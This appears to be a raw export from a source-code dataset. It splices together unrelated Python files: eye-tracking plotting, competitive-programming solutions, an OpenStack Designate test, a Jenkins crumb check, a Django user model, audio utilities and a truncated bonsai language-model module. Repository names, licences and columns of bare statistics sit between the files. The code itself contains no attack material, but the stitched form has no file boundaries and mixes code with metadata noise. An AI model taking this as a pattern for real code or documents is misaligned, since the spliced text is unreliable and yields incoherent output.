xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INDIVIDUAL.format(ident=f'text2qti_choice_{choice.id}', feedback=choice.feedback_html_xml)) xml.append(END_ITEM) xml.append(AFTER_ITEMS) return ''.join(xml)
40.474164
260
0.629769
2,487
26,632
6.386409
0.081624
0.087767
0.052131
0.047598
0.781842
0.714789
0.658377
0.619027
0.559529
0.494302
0
0.006305
0.273393
26,632
657
261
40.535769
0.81448
0.010063
0
0.640212
0
0.001764
0.470215
0.159497
0
0
0
0
0
1
0.001764
false
0
0.001764
0
0.005291
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc09cc4c599dae963fa070fbe9dc0b9a5e9e17c9
1,425
py
Python
code/figure_warp.py
jwcarr/drift
a514c5970ba53025cc142257e953c1bda3cd049c
[ "CC-BY-4.0" ]
2
2021-11-19T10:12:58.000Z
2021-11-30T03:33:59.000Z
code/figure_warp.py
jwcarr/vertical_drift
5b4b6c475b5118950514dc01960391ef0d95bd19
[ "CC-BY-4.0" ]
null
null
null
code/figure_warp.py
jwcarr/vertical_drift
5b4b6c475b5118950514dc01960391ef0d95bd19
[ "CC-BY-4.0" ]
null
null
null
import numpy as np import eyekit import algorithms import core data = eyekit.io.load(core.FIXATIONS / 'sample.json') passages = eyekit.io.load(core.DATA / 'passages.json') original_sequence = data['trial_5']['fixations'] fixation_XY = np.array([fixation.xy for fixation in original_sequence], dtype=int) word_XY = np.array([word.center for word in passages['1B'].words(alphabetical_only=False)], dtype=int) start_times = np.array([i*100 for i in range(len(word_XY))], dtype=int) expected_sequence = eyekit.FixationSequence(np.column_stack([word_XY, start_times, start_times+100])) diagram = eyekit.vis.Image(1920, 1080) diagram.draw_text_block(passages['1B'], mask_text=True) diagram.draw_fixation_sequence(expected_sequence, color='#E32823', fixation_radius=6) diagram.draw_fixation_sequence(original_sequence, color='#205E84', fixation_radius=6) _, warping_path = algorithms.dynamic_time_warping(fixation_XY, word_XY) for fixation, mapped_words in zip(original_sequence, warping_path): for word_i in mapped_words: word_x, word_y = word_XY[word_i] diagram.draw_line(fixation.xy, (word_x, word_y), color='black', stroke_width=0.5, dashed=True) fig = eyekit.vis.Figure() fig.add_image(diagram) fig.set_crop_margin(2) fig.set_padding(vertical=2, horizontal=3, edge=1) fig.set_enumeration(False) fig.save(core.VISUALS / 'illustration_warp.pdf', width=83) # fig.save(core.FIGS / 'fig02_single_column.eps', width=83)
39.583333
102
0.781754
224
1,425
4.745536
0.424107
0.028222
0.022578
0.030103
0
0
0
0
0
0
0
0.031418
0.084211
1,425
35
103
40.714286
0.783142
0.04
0
0
0
0
0.061493
0.015373
0
0
0
0
0
1
0
false
0.115385
0.153846
0
0.153846
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc109f21dbb2efc4b477a59e275c911d6c56316e
221
py
Python
ABC/abc001-abc050/abc007/b.py
KATO-Hiro/AtCoder
cbbdb18e95110b604728a54aed83a6ed6b993fde
[ "CC0-1.0" ]
2
2020-06-12T09:54:23.000Z
2021-05-04T01:34:07.000Z
ABC/abc001-abc050/abc007/b.py
KATO-Hiro/AtCoder
cbbdb18e95110b604728a54aed83a6ed6b993fde
[ "CC0-1.0" ]
961
2020-06-23T07:26:22.000Z
2022-03-31T21:34:52.000Z
ABC/abc001-abc050/abc007/b.py
KATO-Hiro/AtCoder
cbbdb18e95110b604728a54aed83a6ed6b993fde
[ "CC0-1.0" ]
null
null
null
# -*- coding: utf-8 -*- def main(): a = input() # See: # https://www.slideshare.net/chokudai/abc007 if a == 'a': print('-1') else: print('a') if __name__ == '__main__': main()
13
48
0.466063
26
221
3.653846
0.730769
0
0
0
0
0
0
0
0
0
0
0.033333
0.321267
221
16
49
13.8125
0.6
0.312217
0
0
0
0
0.081081
0
0
0
0
0
0
1
0.125
false
0
0
0
0.125
0.25
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc11f9bf036f8314167de520f758c42b9fa4aa63
2,306
py
Python
designate-8.0.0/designate/tests/test_api/test_v2/test_limits.py
scottwedge/OpenStack-Stein
7077d1f602031dace92916f14e36b124f474de15
[ "Apache-2.0" ]
145
2015-01-02T09:35:53.000Z
2021-12-14T17:03:53.000Z
designate/tests/test_api/test_v2/test_limits.py
sapcc/designate
c3f084751006a2fe7562f137930542c4759d6fd9
[ "Apache-2.0" ]
6
2015-03-15T00:22:27.000Z
2019-12-16T09:37:38.000Z
designate/tests/test_api/test_v2/test_limits.py
sapcc/designate
c3f084751006a2fe7562f137930542c4759d6fd9
[ "Apache-2.0" ]
109
2015-01-13T16:47:34.000Z
2021-03-15T13:18:48.000Z
# Copyright 2013 Hewlett-Packard Development Company, L.P. # # Author: Kiall Mac Innes <[email protected]> # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from oslo_config import cfg from designate.tests.test_api.test_v2 import ApiV2TestCase class ApiV2LimitsTest(ApiV2TestCase): def test_get_limits(self): response = self.client.get('/limits/') self.assertEqual(200, response.status_int) self.assertEqual('application/json', response.content_type) self.assertIn('max_zones', response.json) self.assertIn('max_zone_records', response.json) self.assertIn('max_zone_recordsets', response.json) self.assertIn('max_recordset_records', response.json) self.assertIn('min_ttl', response.json) self.assertIn('max_zone_name_length', response.json) self.assertIn('max_recordset_name_length', response.json) self.assertIn('max_page_limit', response.json) absolutelimits = response.json self.assertEqual(cfg.CONF.quota_zones, absolutelimits['max_zones']) self.assertEqual(cfg.CONF.quota_zone_records, absolutelimits['max_zone_recordsets']) self.assertEqual(cfg.CONF['service:central'].min_ttl, absolutelimits['min_ttl']) self.assertEqual(cfg.CONF['service:central'].max_zone_name_len, absolutelimits['max_zone_name_length']) self.assertEqual(cfg.CONF['service:central'].max_recordset_name_len, absolutelimits['max_recordset_name_length']) self.assertEqual(cfg.CONF['service:api'].max_limit_v2, absolutelimits['max_page_limit'])
41.927273
76
0.667823
274
2,306
5.448905
0.434307
0.072338
0.085733
0.112525
0.312793
0.251172
0.134628
0
0
0
0
0.009106
0.238075
2,306
54
77
42.703704
0.840637
0.270598
0
0.15625
0
0
0.183073
0.042617
0
0
0
0
0.5
1
0.03125
false
0
0.0625
0
0.125
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
0
0
0
0
0
0
0
0
1
fc1210baa0e8a8267a154dad6a47b17fe2942673
1,696
py
Python
pythonAnimations/pyOpenGLChess/engineDirectory/oglc-env/lib/python2.7/site-packages/OpenGLContext/scenegraph/nodepath.py
alexus37/AugmentedRealityChess
7f600ad153270feff12aa7aa86d7ed0a49ebc71c
[ "MIT" ]
1
2015-07-12T07:24:17.000Z
2015-07-12T07:24:17.000Z
pythonAnimations/pyOpenGLChess/engineDirectory/oglc-env/lib/python2.7/site-packages/OpenGLContext/scenegraph/nodepath.py
alexus37/AugmentedRealityChess
7f600ad153270feff12aa7aa86d7ed0a49ebc71c
[ "MIT" ]
null
null
null
pythonAnimations/pyOpenGLChess/engineDirectory/oglc-env/lib/python2.7/site-packages/OpenGLContext/scenegraph/nodepath.py
alexus37/AugmentedRealityChess
7f600ad153270feff12aa7aa86d7ed0a49ebc71c
[ "MIT" ]
1
2016-02-19T21:55:53.000Z
2016-02-19T21:55:53.000Z
"""node-path implementation for OpenGLContext """ from vrml.vrml97 import nodepath, nodetypes from vrml.cache import CACHE from OpenGLContext import quaternion from OpenGL.GL import glMultMatrixf class _NodePath( object ): """OpenGLContext-specific node-path class At the moment this only adds a single method, transform() which traverses the path, calling transform() for each Transforming node which has a transform method. """ __slots__ = () def transform( self, mode=None, translate=1, scale=1, rotate=1 ): """For each Transforming node, do OpenGL transform Does _not_ push-pop matrices, so do that before if you want to save your current matrix. This method is useful primarily for storing paths to, for instance, bindable nodes, where you want to be able to rapidly transform down to the node, without needing a full traversal of the scenegraph. """ matrix = self.transformMatrix( translate=translate, scale=scale, rotate=rotate ) glMultMatrixf( matrix ) def quaternion( self ): """Get summary quaternion for all rotations in stack""" nodes = [ node for node in self if ( isinstance(node, nodetypes.Transforming) and hasattr( node, "orientation") ) ] q = quaternion.Quaternion() for node in nodes: q = q * quaternion.fromXYZR( *node.orientation ) return q class NodePath( _NodePath, nodepath.NodePath ): pass class WeakNodePath( _NodePath, nodepath.WeakNodePath ): pass
32
69
0.630896
192
1,696
5.526042
0.5
0.06032
0.035815
0.043355
0
0
0
0
0
0
0
0.004223
0.301887
1,696
52
70
32.615385
0.891892
0.373231
0
0.066667
0
0
0.011423
0
0
0
0
0
0
1
0.066667
false
0.066667
0.133333
0
0.366667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc188927db9f5bd43bd5abe64681e14292f26e08
269
py
Python
features/steps/basic_account_add_bdd.py
MhmdRyhn/behavior_test
868252e0b31596e0bff4a969745cf3b633c13695
[ "MIT" ]
null
null
null
features/steps/basic_account_add_bdd.py
MhmdRyhn/behavior_test
868252e0b31596e0bff4a969745cf3b633c13695
[ "MIT" ]
null
null
null
features/steps/basic_account_add_bdd.py
MhmdRyhn/behavior_test
868252e0b31596e0bff4a969745cf3b633c13695
[ "MIT" ]
null
null
null
import behave @behave.when('I add $1200 to my account') def add_usd_1200(context): context.account.add_cash(amount=1200) @behave.then('It becomes $3200 in my account') def check_for_increase_to_usd_1880(context): assert context.account.current_cash == 3200
22.416667
47
0.762082
43
269
4.55814
0.581395
0.091837
0.122449
0
0
0
0
0
0
0
0
0.102564
0.130112
269
11
48
24.454545
0.735043
0
0
0
0
0
0.204461
0
0
0
0
0
0.142857
1
0.285714
false
0
0.142857
0
0.428571
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
fc1fa639ebbd112d3143f8455e253cf35ff2e2c9
1,033
py
Python
src/main/resources/scripts/crumbDiag.py
cam-laf/vectorcast-execution-plugin
fd54e8580886084d040d21fa809be8a609d44d8e
[ "MIT" ]
4
2019-06-28T22:46:06.000Z
2020-05-28T08:53:37.000Z
src/main/resources/scripts/crumbDiag.py
cam-laf/vectorcast-execution-plugin
fd54e8580886084d040d21fa809be8a609d44d8e
[ "MIT" ]
18
2018-09-26T15:32:11.000Z
2021-10-01T21:57:14.000Z
src/main/resources/scripts/crumbDiag.py
cam-laf/vectorcast-execution-plugin
fd54e8580886084d040d21fa809be8a609d44d8e
[ "MIT" ]
11
2017-03-19T18:37:16.000Z
2020-04-06T19:46:09.000Z
from __future__ import print_function import requests import sys import os verbose=True try: username=os.environ['USERNAME'] password=os.environ['PASSWORD'] except: print("Crumb Diaganostic requires USERNAME/PASSWORD to be set as environment variables") sys.exit(-1) jenkins_url=os.environ['JENKINS_URL'] url = jenkins_url + 'crumbIssuer/api/xml?xpath=concat(//crumbRequestField,":",//crumb)' print(url) if username: crumb = requests.get(url, auth=(username, password)) if crumb.status_code == 200: crumb_headers = dict() crumb_headers[crumb.text.split(":")[0]] = crumb.text.split(":")[1] if verbose: print("Got crumb: %s" % crumb.text) else: print("Failed to get crumb") print("\nYou may need to enable \"Prevent Cross Site Request Forgery exploits\" from:") print("Manage Jenkins > Configure Global Security > CSRF Protection and select the appropriate Crumb Algorithm") print(jenkins_url + "/configureSecurity") sys.exit(-1)
35.62069
120
0.683446
131
1,033
5.29771
0.541985
0.057637
0.023055
0
0
0
0
0
0
0
0
0.008383
0.191675
1,033
28
121
36.892857
0.822754
0
0
0.074074
0
0
0.346563
0.062924
0
0
0
0
0
1
0
false
0.111111
0.148148
0
0.148148
0.296296
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc2653dfaa764320b8eb71e09ae9ebdeb59fea8c
287
py
Python
dynamic_programming/01/01-06.py
fumiyanll23/algo-method
d86ea1d399cbc5a1db0ae49d0c82e41042f661ab
[ "MIT" ]
null
null
null
dynamic_programming/01/01-06.py
fumiyanll23/algo-method
d86ea1d399cbc5a1db0ae49d0c82e41042f661ab
[ "MIT" ]
null
null
null
dynamic_programming/01/01-06.py
fumiyanll23/algo-method
d86ea1d399cbc5a1db0ae49d0c82e41042f661ab
[ "MIT" ]
null
null
null
# input N, M = map(int, input().split()) Ds = [*map(int, input().split())] # compute dp = [False] * (N+1) for ni in range(N+1): if ni == 0: dp[ni] = True for D in Ds: if ni >= D: dp[ni] = dp[ni] or dp[ni-D] # output print("Yes" if dp[-1] else "No")
17.9375
39
0.477352
52
287
2.634615
0.480769
0.116788
0.160584
0.233577
0
0
0
0
0
0
0
0.02
0.303136
287
15
40
19.133333
0.665
0.069686
0
0
0
0
0.019011
0
0
0
0
0
0
1
0
false
0
0
0
0
0.1
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc3188873ff10721356aeaf7e965132781c78f98
793
py
Python
level_one/strings.py
jameskzhao/python36
855e8a6e164065702efa7773da1f089454fdcbcc
[ "Apache-2.0" ]
null
null
null
level_one/strings.py
jameskzhao/python36
855e8a6e164065702efa7773da1f089454fdcbcc
[ "Apache-2.0" ]
null
null
null
level_one/strings.py
jameskzhao/python36
855e8a6e164065702efa7773da1f089454fdcbcc
[ "Apache-2.0" ]
null
null
null
#Basics a = "hello" a += " I'm a dog" print(a) print(len(a)) print(a[1:]) #Output: ello I'm a dog print(a[:5]) #Output: hello(index 5 is not included) print(a[2:5])#Output: llo(index 2 is included) print(a[::2])#Step size #string is immutable so you can't assign a[1]= b x = a.upper() print(x) x = a.capitalize() print(x) x = a.split('e') print(x) x = a.split() #splits the string by space print(x) x = a.strip() #removes any whitespace from beginning or the end print(x) x = a.replace('l','xxx') print(x) x = "Insert another string here: {}".format('insert me!') x = "Item One: {} Item Two: {}".format('dog', 'cat') print(x) x = "Item One: {m} Item Two: {m}".format(m='dog', n='cat') print(x) #command-line string input print("Enter your name:") x = input() print("Hello: {}".format(x))
22.027778
63
0.631778
150
793
3.34
0.426667
0.095808
0.097804
0.07984
0.0998
0.047904
0
0
0
0
0
0.011923
0.153846
793
36
64
22.027778
0.734724
0.320303
0
0.285714
0
0
0.280603
0
0
0
0
0
0
1
0
false
0
0
0
0
0.571429
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
1
fc35043bdda56bc264f387918b5687e34dea2849
1,152
py
Python
api/models/users.py
felipebarraza6/startup_comedy
42b4a4547bffc0d7cf34ace520355d80053bbd9e
[ "MIT" ]
null
null
null
api/models/users.py
felipebarraza6/startup_comedy
42b4a4547bffc0d7cf34ace520355d80053bbd9e
[ "MIT" ]
null
null
null
api/models/users.py
felipebarraza6/startup_comedy
42b4a4547bffc0d7cf34ace520355d80053bbd9e
[ "MIT" ]
null
null
null
"""User Model.""" # Django from django.db import models from django.contrib.auth.models import AbstractUser # Utilities from .utils import ApiModel class User(ApiModel, AbstractUser): email = models.EmailField( 'email', unique = True, ) USERNAME_FIELD = 'email' REQUIRED_FIELDS = ['username', 'first_name', 'last_name'] is_student = models.BooleanField(default=False) class Meta: verbose_name='Usuario' verbose_name_plural='Usuarios' def __str__(self): return self.username def get_short_name(self): return self.username class ProfileUser(ApiModel): user = models.OneToOneField(User, on_delete=models.CASCADE) approved_courses = models.ManyToManyField('api.ResultContest', related_name='user_aproved_courses', blank=True, null=True) tests_performed = models.ManyToManyField('api.ResultTest', related_name='user_result_test', blank=True) class Meta: verbose_name = 'Usuario - Perfil' verbose_name_plural = 'Usuarios - Perfiles' def __str__(self): return str(self.user)
24
71
0.667535
126
1,152
5.865079
0.492063
0.05954
0.043302
0.054127
0.073072
0
0
0
0
0
0
0
0.233507
1,152
47
72
24.510638
0.83692
0.025174
0
0.206897
0
0
0.138117
0
0
0
0
0
0
1
0.103448
false
0
0.103448
0.103448
0.689655
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
0
0
0
1
fc3a04cfd338f72934bd5d86f8126f4adfa55c05
1,330
py
Python
Compare.py
sushantPatrikar/WaveCompartor
112395287b41c1b5533924ebe293c5641647a5e3
[ "MIT" ]
3
2019-10-27T03:45:18.000Z
2022-02-21T18:50:58.000Z
Compare.py
sushantPatrikar/WaveComparator
112395287b41c1b5533924ebe293c5641647a5e3
[ "MIT" ]
null
null
null
Compare.py
sushantPatrikar/WaveComparator
112395287b41c1b5533924ebe293c5641647a5e3
[ "MIT" ]
1
2021-04-20T07:39:37.000Z
2021-04-20T07:39:37.000Z
from scipy.io import wavfile import numpy as np import pingouin as pg import pandas as pd _,data = wavfile.read('wav//ed//mp3baked.wav') _,data1 = wavfile.read('wav//ing//ingeating.wav') i= data.shape[0]-1 j = data1.shape[0]-1 index_1 = -1 index_2 = -1 try: data.shape[1] except IndexError: data = data.reshape(data.shape[0],1) try: data1.shape[1] except IndexError: data1 = data1.reshape(data1.shape[0],1) while True: if data[i,0] !=0 and index_1==-1: index_1 = i pass if data1[j,0] !=0 and index_2==-1: index_2 = j pass if index_1!=-1 and index_2!=-1: break i-=1 j-=1 data = data[-index_1:,:] data1 = data1[-index_2:,:] data = data[-2000:,:] data1= data1[-2000:,:] x =pg.corr(x=data[:,0],y=data1[:,0]) print(x) # print(data.tostring()) # print(data1.tostring()) # data = data[:,:] # data1 = data1[:,:] # data = data.reshape(data.shape[0],1) # data1 = data1.reshape(data1.shape[0],1) # data = data[-10000:,:] # data1 = data1[-10000:,:] # print(data1.shape[1]) # df = pd.DataFrame(data,data1) # print(df.head()) # print(data1.shape) # data = data[-5000:,:] # data1 = data1[-5000:,:] # # # x =pg.corr(x=data[:,0],y=data1[:,0]) # print(x)
15.647059
50
0.552632
201
1,330
3.597015
0.238806
0.077455
0.058091
0.045643
0.224066
0.224066
0.224066
0.071923
0.071923
0.071923
0
0.094378
0.251128
1,330
84
51
15.833333
0.631526
0.291729
0
0.171429
0
0
0.052443
0.052443
0
0
0
0
0
1
0
false
0.057143
0.114286
0
0.114286
0.028571
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc403c27d1d4da0e66a446351a2e2650278bc62d
1,527
py
Python
pyACA/ToolFreq2Bark.py
ruohoruotsi/pyACA
339e9395b65a217aa5965638af941b32d5c95454
[ "MIT" ]
81
2019-07-08T15:48:03.000Z
2022-03-21T22:52:25.000Z
pyACA/ToolFreq2Bark.py
ruohoruotsi/pyACA
339e9395b65a217aa5965638af941b32d5c95454
[ "MIT" ]
24
2019-10-03T19:20:18.000Z
2022-02-28T17:20:40.000Z
pyACA/ToolFreq2Bark.py
ruohoruotsi/pyACA
339e9395b65a217aa5965638af941b32d5c95454
[ "MIT" ]
26
2019-07-18T23:50:52.000Z
2022-03-10T14:59:35.000Z
# -*- coding: utf-8 -*- """ helper function: convert Hz to Bark scale Args: fInHz: The frequency to be converted, can be scalar or vector cModel: The name of the model ('Schroeder' [default], 'Terhardt', 'Zwicker', 'Traunmuller') Returns: Bark values of the input dimension """ import numpy as np import math def ToolFreq2Bark(fInHz, cModel = 'Schroeder'): def acaSchroeder_scalar(f): return 7 * math.asinh(f/650) def acaTerhardt_scalar(f): return 13.3 * math.atan(0.75 * f/1000) def acaZwicker_scalar(f): return 13 * math.atan(0.76 * f/1000) + 3.5 * math.atan(f/7500) def acaTraunmuller_scalar(f): return 26.81/(1+1960./f) - 0.53 f = np.asarray(fInHz) if f.ndim == 0: if cModel == 'Terhardt': return acaTerhardt_scalar(f) elif cModel == 'Zwicker': return acaZwicker_scalar(f) elif cModel == 'Traunmuller': return acaTraunmuller_scalar(f) else: return acaSchroeder_scalar(f) fBark = np.zeros(f.shape) if cModel == 'Terhardt': for k,fi in enumerate(f): fBark[k] = acaTerhardt_scalar(fi) elif cModel == 'Zwicker': for k,fi in enumerate(f): fBark[k] = acaZwicker_scalar(fi) elif cModel == 'Traunmuller': for k,fi in enumerate(f): fBark[k] = acaTraunmuller_scalar(fi) else: for k,fi in enumerate(f): fBark[k] = acaSchroeder_scalar(fi) return (fBark)
28.811321
95
0.591356
199
1,527
4.477387
0.38191
0.062851
0.058361
0.035915
0.107744
0.107744
0.107744
0.107744
0
0
0
0.040553
0.289456
1,527
52
96
29.365385
0.780645
0.18795
0
0.342857
0
0
0.049513
0
0
0
0
0
0
1
0.142857
false
0
0.057143
0.114286
0.457143
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
0
0
0
1
fc43b75bb4a6cda564bcd320da8b77c8174105e4
58,644
py
Python
bonsai/model.py
ipa-mirb/bonsai
cb73317cdf779566f7c496fc39546c9c689aa09c
[ "MIT" ]
null
null
null
bonsai/model.py
ipa-mirb/bonsai
cb73317cdf779566f7c496fc39546c9c689aa09c
[ "MIT" ]
null
null
null
bonsai/model.py
ipa-mirb/bonsai
cb73317cdf779566f7c496fc39546c9c689aa09c
[ "MIT" ]
null
null
null
#Copyright (c) 2017 Andre Santos # #Permission is hereby granted, free of charge, to any person obtaining a copy #of this software and associated documentation files (the "Software"), to deal #in the Software without restriction, including without limitation the rights #to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #copies of the Software, and to permit persons to whom the Software is #furnished to do so, subject to the following conditions: #The above copyright notice and this permission notice shall be included in #all copies or substantial portions of the Software. #THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN #THE SOFTWARE. ############################################################################### # Language Model ############################################################################### class CodeEntity(object): """Base class for all programming entities. All code objects have a file name, a line number, a column number, a programming scope (e.g. the function or code block they belong to) and a parent object that should have some variable or collection holding this object. """ def __init__(self, scope, parent): """Base constructor for code objects. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ self.scope = scope self.parent = parent self.file = None self.line = None self.column = None def walk_preorder(self): """Iterates the program tree starting from this object, going down.""" yield self for child in self._children(): for descendant in child.walk_preorder(): yield descendant def filter(self, cls, recursive=False): """Retrieves all descendants (including self) that are instances of a given class. Args: cls (class): The class to use as a filter. Kwargs: recursive (bool): Whether to descend recursively down the tree. """ source = self.walk_preorder if recursive else self._children return [ codeobj for codeobj in source() if isinstance(codeobj, cls) ] def _afterpass(self): """Finalizes the construction of a code entity.""" pass def _validity_check(self): """Check whether this object is a valid construct.""" return True def _children(self): """Yield all direct children of this object.""" # The default implementation has no children, and thus should return # an empty iterator. return iter(()) def _lookup_parent(self, cls): """Lookup a transitive parent object that is an instance of a given class.""" codeobj = self.parent while codeobj is not None and not isinstance(codeobj, cls): codeobj = codeobj.parent return codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ return (' ' * indent) + self.__str__() def ast_str(self, indent=0): """Return a minimal string to print a tree-like structure. Kwargs: indent (int): The number of indentation levels. """ line = self.line or 0 col = self.column or 0 name = type(self).__name__ spell = getattr(self, 'name', '[no spelling]') result = ' ({})'.format(self.result) if hasattr(self, 'result') else '' prefix = indent * '| ' return '{}[{}:{}] {}{}: {}'.format(prefix, line, col, name, result, spell) def __str__(self): """Return a string representation of this object.""" return self.__repr__() def __repr__(self): """Return a string representation of this object.""" return '[unknown]' class CodeStatementGroup(object): """This class is meant to provide common utility methods for objects that group multiple program statements together (e.g. functions, code blocks). It is not meant to be instantiated directly, only used for inheritance purposes. It defines the length of a statement group, and provides methods for integer-based indexing of program statements (as if using a list). """ def statement(self, i): """Return the *i*-th statement from the object's `body`.""" return self.body.statement(i) def statement_after(self, i): """Return the statement after the *i*-th one, or `None`.""" try: return self.statement(i + 1) except IndexError as e: return None def __getitem__(self, i): """Return the *i*-th statement from the object's `body`.""" return self.statement(i) def __len__(self): """Return the length of the statement group.""" return len(self.body) # ----- Common Entities ------------------------------------------------------- class CodeVariable(CodeEntity): """This class represents a program variable. A variable typically has a name, a type (`result`) and a value (or `None` for variables without a value or when the value is unknown). Additionally, a variable has an `id` which uniquely identifies it in the program (useful to resolve references), a list of references to it and a list of statements that write new values to the variable. If the variable is a *member*/*field*/*attribute* of an object, `member_of` should contain a reference to such object, instead of `None`. """ def __init__(self, scope, parent, id, name, result): """Constructor for variables. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. id: An unique identifier for this variable. name (str): The name of the variable in the program. result (str): The type of the variable in the program. """ CodeEntity.__init__(self, scope, parent) self.id = id self.name = name self.result = result self.value = None self.member_of = None self.references = [] self.writes = [] @property def is_definition(self): return True @property def is_local(self): """Whether this is a local variable. In general, a variable is *local* if its containing scope is a statement (e.g. a block), or a function, given that the variable is not one of the function's parameters. """ return (isinstance(self.scope, CodeStatement) or (isinstance(self.scope, CodeFunction) and self not in self.scope.parameters)) @property def is_global(self): """Whether this is a global variable. In general, a variable is *global* if it is declared directly under the program's global scope or a namespace. """ return isinstance(self.scope, (CodeGlobalScope, CodeNamespace)) @property def is_parameter(self): """Whether this is a function parameter.""" return (isinstance(self.scope, CodeFunction) and self in self.scope.parameters) @property def is_member(self): """Whether this is a member/attribute of a class or object.""" return isinstance(self.scope, CodeClass) def _add(self, codeobj): """Add a child (value) to this object.""" assert isinstance(codeobj, CodeExpression.TYPES) self.value = codeobj def _children(self): """Yield all direct children of this object.""" if isinstance(self.value, CodeEntity): yield self.value def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ return '{}{} {} = {}'.format(' ' * indent, self.result, self.name, pretty_str(self.value)) def __repr__(self): """Return a string representation of this object.""" return '[{}] {} = ({})'.format(self.result, self.name, self.value) class CodeFunction(CodeEntity, CodeStatementGroup): """This class represents a program function. A function typically has a name, a return type (`result`), a list of parameters and a body (a code block). It also has an unique `id` that identifies it in the program and a list of references to it. If a function is a method of some class, its `member_of` should be set to the corresponding class. """ def __init__(self, scope, parent, id, name, result, definition=True): """Constructor for functions. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. id: An unique identifier for this function. name (str): The name of the function in the program. result (str): The return type of the function in the program. """ CodeEntity.__init__(self, scope, parent) self.id = id self.name = name self.result = result self.parameters = [] self.body = CodeBlock(self, self, explicit=True) self.member_of = None self.references = [] self._definition = self if definition else None @property def is_definition(self): """Whether this is a function definition or just a declaration.""" return self._definition is self @property def is_constructor(self): """Whether this function is a class constructor.""" return self.member_of is not None def _add(self, codeobj): """Add a child (statement) to this object.""" assert isinstance(codeobj, (CodeStatement, CodeExpression)) self.body._add(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.parameters: yield codeobj for codeobj in self.body._children(): yield codeobj def _afterpass(self): """Assign a function-local index to each child object and register write operations to variables. This should only be called after the object is fully built. """ if hasattr(self, '_fi'): return fi = 0 for codeobj in self.walk_preorder(): codeobj._fi = fi fi += 1 if isinstance(codeobj, CodeOperator) and codeobj.is_assignment: if codeobj.arguments and isinstance(codeobj.arguments[0], CodeReference): var = codeobj.arguments[0].reference if isinstance(var, CodeVariable): var.writes.append(codeobj) def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent params = ', '.join(map(lambda p: p.result + ' ' + p.name, self.parameters)) if self.is_constructor: pretty = '{}{}({}):\n'.format(spaces, self.name, params) else: pretty = '{}{} {}({}):\n'.format(spaces, self.result, self.name, params) if self._definition is not self: pretty += spaces + ' [declaration]' else: pretty += self.body.pretty_str(indent + 2) return pretty def __repr__(self): """Return a string representation of this object.""" params = ', '.join(map(str, self.parameters)) return '[{}] {}({})'.format(self.result, self.name, params) class CodeClass(CodeEntity): """This class represents a program class for object-oriented languages. A class typically has a name, an unique `id`, a list of members (variables, functions), a list of superclasses, and a list of references. If a class is defined within another class (inner class), it should have its `member_of` set to the corresponding class. """ def __init__(self, scope, parent, id_, name, definition=True): """Constructor for classes. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. id: An unique identifier for this class. name (str): The name of the class in the program. """ CodeEntity.__init__(self, scope, parent) self.id = id_ self.name = name self.members = [] self.superclasses = [] self.member_of = None self.references = [] self._definition = self if 